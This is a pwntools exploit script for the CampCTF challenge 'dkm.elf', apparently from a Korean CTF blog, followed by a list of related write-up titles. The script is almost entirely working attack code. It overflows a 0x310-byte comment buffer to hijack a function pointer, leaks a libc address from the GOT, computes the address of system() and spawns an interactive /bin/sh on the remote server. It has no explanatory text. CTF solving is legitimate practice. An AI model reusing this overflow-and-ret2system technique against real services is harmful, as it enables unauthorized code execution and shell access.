#!/usr/bin/env python
from pwn import *
context.arch = 'amd64'
elf = ELF('dkm.elf')
puts = elf.got['__libc_start_main']
#r = remote("localhost", 5555)
r = remote("challs.campctf.ccc.ac", 10102)
r.recvuntil('> ')
def send_menu(r, s):
r.send(s+'\n')
print r.recvuntil('> ')
send_menu(r, '2')
send_menu(r, '1')
send_menu(r, '0')
send_menu(r, '0')
send_menu(r, '0') # number of ssid
send_menu(r, 'no comment')
send_menu(r, '4')
send_menu(r, '0')
send_menu(r, '2')
send_menu(r, '0')
send_menu(r, '0')
send_menu(r, 'no comment')
send_menu(r, '2')
send_menu(r, '1')
send_menu(r, '0')
send_menu(r, '0')
send_menu(r, '0')
send_menu(r, 'no comment')
send_menu(r, '4')
send_menu(r, '0')
send_menu(r, '3')
send_menu(r, '0')
send_menu(r, '0')
send_menu(r, '0')
libc_start_addr = 0
SYSTEM_OFFSET = 0x23a80 # libc_start - system. brute force this offset!
show_with_wifi = 0x4009F0
# stage1> leak got
comment = 'A'*0x310
comment += pack(0) # latitude
comment += pack(0) # longitude
comment += pack(show_with_wifi) # show with wifi
comment += pack(0xdeadbeef) # edit
comment += pack(puts) # &got.puts
comment += pack(0)
r.send( comment + '\n' )
print r.recvuntil('> ')
r.send('1\n')
leak = r.recvuntil('> ')
print leak
leak = leak.split('SSID: ')[1]
libc_start_addr = int(leak[:6][::-1].encode('hex'), 16)
system_addr = libc_start_addr + SYSTEM_OFFSET
print 'libc_start at -{0}-'.format(hex(libc_start_addr))
print 'system at -{0}-'.format(hex(system_addr))
# stage2> jmp to system
send_menu(r, '4')
send_menu(r, '0')
send_menu(r, '3')
send_menu(r, '0')
send_menu(r, '0')
send_menu(r, '0')
comment = 'A'*0x310
comment += '/bin/sh\0' # latitute -> "/bin/sh"
comment += pack(0) # longitude
comment += pack(system_addr) # chage show to system
comment += pack(0xdeadbeef) # edit
comment += pack(0)
r.send( comment + '\n' )
print r.recvuntil('> ')
r.send('1\n')
r.interactive()
'Games > CTF' 카테고리의 다른 글
| PlaidCTF 2016 fixedpoint (0) | 2016.04.19 |
|---|---|
| PlaidCTF 2016 pzip (0) | 2016.04.19 |
| PlaidCTF 2015 RAM (0) | 2015.11.18 |
| 화이트햇 콘테스트 2015 한글 익스플로잇 분석 (6) | 2015.10.27 |
| EKO CTF pwn200 (0) | 2015.09.17 |